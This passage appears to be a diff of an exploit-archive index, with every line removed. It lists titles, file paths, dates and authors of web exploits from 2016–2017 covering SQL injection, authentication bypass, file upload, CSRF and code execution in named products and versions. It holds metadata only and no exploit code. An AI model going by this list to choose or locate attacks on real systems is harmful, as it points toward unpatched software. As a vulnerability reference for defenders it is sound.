-40976,exploits/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,php,webapps, -40977,exploits/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,hardware,webapps, -40978,exploits/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps, -40979,exploits/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps, -40982,exploits/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps, -40983,exploits/hardware/webapps/40983.html,"D-Link DI-524 - Cross-Site Request Forgery",2016-12-09,"Felipe Soares de Souza",hardware,webapps, -40986,exploits/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps, -40989,exploits/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps, -40997,exploits/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps, -40998,exploits/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps, -40999,exploits/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps, -41027,exploits/php/webapps/41027.txt,"Dating Script 3.25 - SQL Injection",2017-01-11,"Dawid Morawski",php,webapps, -41001,exploits/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' SQL Injection",2017-01-09,"Sniper Pex",php,webapps, -41002,exploits/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' SQL Injection",2017-01-09,v3n0m,php,webapps, -41004,exploits/php/webapps/41004.txt,"Starting Page 1.3 - 'linkid' SQL Injection",2017-01-10,JaMbA,php,webapps, -41005,exploits/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps, -41006,exploits/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps, -41007,exploits/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps, -41009,exploits/php/webapps/41009.txt,"Starting Page 1.3 - 'category' SQL Injection",2017-01-11,"Ben Lee",php,webapps, -41010,exploits/php/webapps/41010.txt,"My Link Trader 1.1 - 'id' SQL Injection",2017-01-11,"Dawid Morawski",php,webapps, -41011,exploits/php/webapps/41011.txt,"b2evolution 6.8.2 - Arbitrary File Upload",2016-12-29,"Li Fei",php,webapps, -41014,exploits/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps, -41017,exploits/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery (1)",2017-01-10,Vulnerability-Lab,hardware,webapps, -41023,exploits/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps, -41024,exploits/php/webapps/41024.txt,"Itech Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps, -41028,exploits/php/webapps/41028.txt,"Itech Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps, -41029,exploits/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps, -41032,exploits/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' SQL Injection",2017-01-11,v3n0m,php,webapps, -41033,exploits/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",hardware,webapps, -41034,exploits/php/webapps/41034.txt,"School Management Software 2.75 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps, -41036,exploits/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps, -41037,exploits/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps, -41038,exploits/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps, -41040,exploits/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps, -41043,exploits/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps, -41044,exploits/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps, -41045,exploits/php/webapps/41045.txt,"Just Dial Marketplace - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps, -41046,exploits/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps, -41047,exploits/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps, -41048,exploits/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps, -41049,exploits/php/webapps/41049.txt,"Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps, -41050,exploits/php/webapps/41050.txt,"Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps, -41051,exploits/php/webapps/41051.txt,"Inout SmartDeal 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps, -41052,exploits/php/webapps/41052.txt,"Inout QuerySpace 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps, -41053,exploits/php/webapps/41053.txt,"Inout CareerLamp 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps, -41054,exploits/php/webapps/41054.txt,"Inout SocialTiles 2.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps, -41055,exploits/php/webapps/41055.txt,"Inout Celebrities 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps, -41056,exploits/php/webapps/41056.txt,"Education Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps, -41060,exploits/php/webapps/41060.txt,"9 Network Linkedin Clone Script - Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps, -41058,exploits/php/webapps/41058.txt,"Professional Service Booking Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps, -41059,exploits/php/webapps/41059.txt,"Courier Business Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps, -41061,exploits/php/webapps/41061.txt,"Article Directory Script Seo 3.2 - Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps, -41062,exploits/php/webapps/41062.txt,"e-Soft24 Jokes Portal Script Seo 1.3 - Authentication Bypass",2017-01-15,"Ihsan Sencan",php,webapps, -41063,exploits/php/webapps/41063.txt,"MC Smart Shop Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps, -41064,exploits/php/webapps/41064.txt,"MC Buy and Sell Cars Script 1.1 - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps, -41065,exploits/php/webapps/41065.txt,"MC Yellow Pages Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps, -41066,exploits/php/webapps/41066.txt,"MC Real Estate Pro Script - Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps, -41067,exploits/php/webapps/41067.html,"MC Hosting Coupons Script - Cross-Site Request Forgery",2017-01-15,"Ihsan Sencan",php,webapps, -41068,exploits/php/webapps/41068.txt,"MC Inventory Manager Script - Multiple Vulnerabilities",2017-01-15,"Ihsan Sencan",php,webapps, -41070,exploits/php/webapps/41070.txt,"MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps, -41071,exploits/php/webapps/41071.txt,"MC Documentation Creator Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps, -41074,exploits/hardware/webapps/41074.txt,"Huawei Flybox B660 - Cross-Site Request Forgery (2)",2017-01-12,Vulnerability-Lab,hardware,webapps, -41075,exploits/php/webapps/41075.txt,"Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting",2017-01-16,"Ahmet Gurel",php,webapps, -41077,exploits/hardware/webapps/41077.sh,"Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps, -41078,exploits/hardware/webapps/41078.sh,"Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps, -41080,exploits/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",php,webapps, -41081,exploits/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",php,webapps, -41082,exploits/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",java,webapps, -41083,exploits/php/webapps/41083.txt,"dirLIST 0.3.0 - Arbitrary File Upload",2017-01-17,hyp3rlinx,php,webapps, -41084,exploits/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,php,webapps, -41086,exploits/aspx/webapps/41086.txt,"Check Box 2016 Q2 Survey - Multiple Vulnerabilities",2017-01-17,"Fady Mohammed Osman",aspx,webapps, -41087,exploits/php/webapps/41087.txt,"Openexpert 0.5.17 - 'area_id' SQL Injection",2017-01-17,"Nassim Asrir",php,webapps, -41091,exploits/php/webapps/41091.txt,"Medical Clinic Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41092,exploits/php/webapps/41092.txt,"Fileserve Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",php,webapps, -41093,exploits/php/webapps/41093.txt,"Auction Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41094,exploits/php/webapps/41094.txt,"Wetransfer Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",php,webapps, -41095,exploits/php/webapps/41095.txt,"Finance Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41096,exploits/php/webapps/41096.txt,"Justdial Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",php,webapps, -41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41098,exploits/php/webapps/41098.txt,"Buy and Sell Market Place Software - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41099,exploits/php/webapps/41099.txt,"Dentist Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41100,exploits/php/webapps/41100.txt,"Manufacturer Website Design Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41101,exploits/php/webapps/41101.txt,"Micro Blog Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41102,exploits/php/webapps/41102.txt,"My Private Tutor Website Builder Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41103,exploits/php/webapps/41103.txt,"NGO Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41104,exploits/php/webapps/41104.txt,"Yoga and Fitness Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41105,exploits/php/webapps/41105.txt,"NGO Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41106,exploits/php/webapps/41106.txt,"Questions and Answers Script 1.1.3 - 'id' SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41107,exploits/php/webapps/41107.txt,"Online Mobile Recharge Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41108,exploits/php/webapps/41108.txt,"Clone of Oddee Script 1.1.3 - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41109,exploits/php/webapps/41109.txt,"Online Printing Business Clone Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41110,exploits/php/webapps/41110.txt,"Online Tshirt Design Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41111,exploits/php/webapps/41111.txt,"Shiksha Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41112,exploits/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41113,exploits/php/webapps/41113.txt,"Courier Management System - SQL Injection",2017-01-17,"Sibusiso Sishi",php,webapps, -41114,exploits/php/webapps/41114.txt,"Flippa Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps, -41117,exploits/hardware/webapps/41117.sh,"Tenda ADSL2/2+ Modem D820R - Unauthenticated DNS Change",2017-01-19,"Todor Donev",hardware,webapps, -41116,exploits/php/webapps/41116.txt,"B2B Script 4.27 - SQL Injection",2017-01-18,"Dawid Morawski",php,webapps, -41118,exploits/hardware/webapps/41118.sh,"Pirelli DRG A115 v3 ADSL Router - Unauthenticated DNS Change",2017-01-19,"Todor Donev",hardware,webapps, -41119,exploits/php/webapps/41119.txt,"Viral Image & Video Sharing GagZone Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps, -41120,exploits/php/webapps/41120.txt,"Image and Video Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps, -41121,exploits/php/webapps/41121.txt,"Social News and Bookmarking Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps, -41122,exploits/php/webapps/41122.txt,"Viral Image Sharing Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps, -41123,exploits/php/webapps/41123.txt,"Vine VideoSite Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps, -41124,exploits/php/webapps/41124.txt,"Job Vacancy Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps, -41125,exploits/php/webapps/41125.txt,"Home of Viral Images_ Videos and Articles Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps, -41126,exploits/php/webapps/41126.txt,"Video Site Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps, -41127,exploits/php/webapps/41127.txt,"Classifieds Script - 'term' SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps, -41131,exploits/php/webapps/41131.txt,"Complain Management System - SQL injection",2017-01-20,"Sibusiso Sishi",php,webapps, -41132,exploits/php/webapps/41132.txt,"ICGames-Games Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps, -41133,exploits/php/webapps/41133.txt,"Domains Marketplace Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps, -41134,exploits/php/webapps/41134.txt,"ICTutors Tutoring Site Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps, -41135,exploits/php/webapps/41135.txt,"Mini Blog 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps, -41136,exploits/php/webapps/41136.txt,"Job Site PHP Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps, -41137,exploits/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps, -41138,exploits/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps, -41139,exploits/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps, -41140,exploits/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps, -41141,exploits/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps, -41143,exploits/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps, -41147,exploits/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps, -41150,exploits/php/webapps/41150.txt,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",php,webapps,80 -41155,exploits/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",php,webapps, -41156,exploits/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",php,webapps, -41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",php,webapps, -41159,exploits/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps, -41166,exploits/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps, -41167,exploits/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps, -41168,exploits/php/webapps/41168.txt,"KB Messages PHP Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps, -41169,exploits/php/webapps/41169.txt,"Web Based TimeSheet Script - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps, -41170,exploits/hardware/webapps/41170.txt,"TM RG4332 Wireless Router - Arbitrary File Disclosure",2017-01-26,"Saeid Atabaki",hardware,webapps, -41172,exploits/php/webapps/41172.txt,"PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting",2017-01-26,"Manish Tanwar",php,webapps, -41175,exploits/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps, -41177,exploits/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps, -41178,exploits/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps, -41179,exploits/cgi/webapps/41179.txt,"Radisys MRF - Command Injection",2017-01-27,"Filippos Mastrogiannis",cgi,webapps, -41180,exploits/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (2)",2017-01-27,"Lenon Leite",php,webapps, -41181,exploits/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps, -41182,exploits/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps, -41184,exploits/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps, -41185,exploits/php/webapps/41185.txt,"PHP PEAR 1.10.1 - Arbitrary File Download",2017-01-30,hyp3rlinx,php,webapps, -41186,exploits/php/webapps/41186.txt,"Caregiver Script 2.57 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41187,exploits/php/webapps/41187.txt,"Itech Auction Script 6.49 - 'mcid' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41188,exploits/php/webapps/41188.txt,"Itech B2B Script 4.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41189,exploits/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41190,exploits/php/webapps/41190.txt,"Itech Dating Script 3.26 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41191,exploits/php/webapps/41191.txt,"Itech Freelancer Script 5.13 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41193,exploits/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - 'pl' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41194,exploits/php/webapps/41194.txt,"Itech News Portal Script 6.28 - 'inf' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41195,exploits/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41197,exploits/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps, -41198,exploits/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps, -41199,exploits/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps, -41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps, -41205,exploits/hardware/webapps/41205.py,"NETGEAR Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",hardware,webapps, -41201,exploits/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps, -41202,exploits/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps, -41203,exploits/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps, -41204,exploits/php/webapps/41204.txt,"Itech Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps, -41208,exploits/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",hardware,webapps, -41209,exploits/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' SQL Injection",2017-01-28,"Persian Hack Team",php,webapps, -41210,exploits/php/webapps/41210.txt,"LogoStore - 'query' SQL Injection",2017-02-01,"Kaan KAMIS",php,webapps, -41223,exploits/linux/webapps/41223.py,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)",2017-02-02,leonjza,linux,webapps, -41224,exploits/linux/webapps/41224.rb,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",linux,webapps, -41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps, -41225,exploits/php/webapps/41225.txt,"Property Listing Script - 'propid' Blind SQL Injection",2017-02-02,"Kaan KAMIS",php,webapps, -41226,exploits/php/webapps/41226.txt,"Itech Inventory Management Software 3.77 - SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps, -41230,exploits/php/webapps/41230.txt,"Itech Movie Portal Script 7.37 - SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps, -41228,exploits/php/webapps/41228.txt,"Itech News Portal Script 6.28 - 'sc' SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps, -41229,exploits/php/webapps/41229.txt,"Itech Auction Script 6.49 - 'pid' SQL Injection",2017-02-02,"Ihsan Sencan",php,webapps, -41235,exploits/php/webapps/41235.txt,"SlimarUSER Management 1.0 - 'id' SQL Injection",2017-02-03,"Kaan KAMIS",php,webapps, -41238,exploits/php/webapps/41238.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-02-03,Th3GundY,php,webapps, -41239,exploits/php/webapps/41239.txt,"Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery",2017-02-03,"Tim Herres",php,webapps,80 -41241,exploits/php/webapps/41241.txt,"Alstrasoft EPay Enterprise 5.17 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps, -41242,exploits/php/webapps/41242.txt,"Alstrasoft ProTaxi Enterprise 3.5 - Arbitrary File Upload",2017-02-04,"Ihsan Sencan",php,webapps, -41243,exploits/php/webapps/41243.txt,"Alstrasoft e-Friends 5.12 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps, -41244,exploits/php/webapps/41244.txt,"Alstrasoft Video Share Enterprise 4.72 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps, -41245,exploits/php/webapps/41245.html,"Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps, -41246,exploits/php/webapps/41246.html,"Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps, -41247,exploits/php/webapps/41247.txt,"Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps, -41249,exploits/php/webapps/41249.pl,"Alstrasoft Template Seller Pro 3.25e - 'tempid' SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps, -41250,exploits/php/webapps/41250.txt,"Itech Job Portal Script 9.13 - Multiple Vulnerabilities",2017-02-04,Th3GundY,php,webapps, -41251,exploits/php/webapps/41251.txt,"iScripts AutoHoster 3.0 - 'siteid' SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps, -41252,exploits/php/webapps/41252.txt,"iScripts EasyCreate 3.2 - 'siteid' SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps, -41253,exploits/php/webapps/41253.txt,"ThisIsWhyImBroke Clone Script 4.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41254,exploits/php/webapps/41254.txt,"Upworthy Clone Script 1.1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41255,exploits/php/webapps/41255.txt,"Ultimate Viral Media Script 1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41256,exploits/php/webapps/41256.txt,"Visual Link Sharing Websites Builder Script 2.1.0 - SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41266,exploits/php/webapps/41266.txt,"Fully Featured News CMS 1.0 - 'id' SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps, -41267,exploits/php/webapps/41267.txt,"MySQL File Uploader 1.0 - 'id' SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps, -41258,exploits/php/webapps/41258.txt,"Funny Image and Video Script 2.0.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41259,exploits/php/webapps/41259.txt,"Clone Script Directory Script 1.1.0 - 'cid' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41260,exploits/php/webapps/41260.txt,"Viral Pictures and Video Script 2.0.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41261,exploits/php/webapps/41261.txt,"NewsBee CMS - SQL Injection",2017-02-06,"Kaan KAMIS",php,webapps, -41262,exploits/php/webapps/41262.txt,"Web Inspiration Gallery Script 1.0.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41263,exploits/php/webapps/41263.txt,"Viral Fun Facts Sharing Script 1.1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41264,exploits/php/webapps/41264.txt,"Questions and Answers Script 2.0.0 - 'cid' SQL Injection",2017-02-06,"Ihsan Sencan",php,webapps, -41268,exploits/php/webapps/41268.txt,"Easy Support Tools 1.0 - 'stt' SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps, -41269,exploits/php/webapps/41269.txt,"Easy Web Search 3 - 'id' SQL Injection",2017-02-07,"Ihsan Sencan",php,webapps, -41270,exploits/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps, -41271,exploits/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps, -41272,exploits/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",php,webapps, -41279,exploits/php/webapps/41279.txt,"Muviko Video CMS - SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps, -41280,exploits/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps, -41283,exploits/php/webapps/41283.txt,"Mobiketa 3.5 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps, -41284,exploits/php/webapps/41284.txt,"Sendroid 5.2 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps, -41285,exploits/php/webapps/41285.txt,"Fome SMS Portal 2.0 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps, -41286,exploits/php/webapps/41286.txt,"SOA School Management - 'view' SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps, -41287,exploits/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps, -41288,exploits/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps, -41290,exploits/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41291,exploits/php/webapps/41291.txt,"Tiger Post 3.0.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, 